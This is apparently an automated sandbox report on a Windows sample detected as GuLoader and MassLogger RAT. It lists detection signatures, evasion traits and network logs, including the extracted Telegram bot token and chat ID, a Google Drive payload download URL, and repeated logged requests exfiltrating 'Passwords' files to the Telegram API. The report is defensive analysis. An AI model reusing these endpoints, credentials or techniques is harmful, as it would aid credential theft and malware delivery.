
Windows Analysis Report
4NG0guPiKA.exe

Overview

General Information

Sample name:4NG0guPiKA.exe
renamed because original name is a hash value
Original sample name:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47.exe
Analysis ID:1588607
MD5:8f02b3e31021d64ed25a599e58bc8f2f
SHA1:7bec44b33d33f11de7f626097b70758f60f655f5
SHA256:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47
Tags:exeuser-adrian__luca

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager (disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 4NG0guPiKA.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\4NG0guPiKA.exe" MD5: 8F02B3E31021D64ED25A599E58BC8F2F)
    • 4NG0guPiKA.exe (PID: 8156 cmdline: "C:\Users\user\Desktop\4NG0guPiKA.exe" MD5: 8F02B3E31021D64ED25A599E58BC8F2F)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Telegram Chatid": "2065242915"}
Yara matches (Source / Rule / Description / Author / Strings):
  • Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Author: Joe Security
  • Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
  • Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
  • Source: 00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
  • Source: Process Memory Space: 4NG0guPiKA.exe PID: 8156, Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Author: Joe Security
            No Sigma rule has matched

            AV Detection

Source: 4NG0guPiKA.exe, Avira: detected
Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Telegram Chatid": "2065242915"}
Source: 4NG0guPiKA.exe.8156.3.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendMessage"}
Source: 4NG0guPiKA.exe, Virustotal: Detection: 76%
Source: 4NG0guPiKA.exe, ReversingLabs: Detection: 63%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 3_2_331ED1EC CryptUnprotectData, 3_2_331ED1EC
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 3_2_331ED9D9 CryptUnprotectData, 3_2_331ED9D9
Source: 4NG0guPiKA.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49711 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405772
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 0_2_0040622D FindFirstFileW,FindClose, 0_2_0040622D
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 3_2_00402770 FindFirstFileW, 3_2_00402770
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_00405772
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, Code function: 3_2_0040622D FindFirstFileW,FindClose, 3_2_0040622D
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, File opened: C:\Users\user\Desktop\4NG0guPiKA.exe
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, File opened: C:\Users\user\AppData\Local\Temp\nst6786.tmp
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, File opened: C:\Users\user
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Jaskendes.Tin19
Source: C:\Users\user\Desktop\4NG0guPiKA.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Skankeben.Pri

            Networking

            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ba864dec1bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31feab93e593Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322ad5683121Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327b8ca4e039Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329c1e4798fcHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32f4decf3f7aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd336aba261bebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3397358e49f3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b140535537Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33c89ef7f87dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e3cef7ff2fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33fd9dff96dbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd341dc0addca8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd343c81d2ea8cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd345f0111b6e8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd348169074dc8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34a782720438Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34d1471b6fa1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34f9a68ce3e0Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3526ec8c239eHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd357d60fe315aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35b450780516Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35f180510c0bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3633a7f99f46Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd369e576146ceHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36efca5c9cbaHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3759920c3fb5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37c46c893414Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3847c2e14721Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd38c1b36f23eaHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd393cc0358b5dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd39b997d3f58bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3a0842782977Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3a8a4b2b1383Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49713 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49727 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49710 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49708 -> 142.250.181.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49711 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
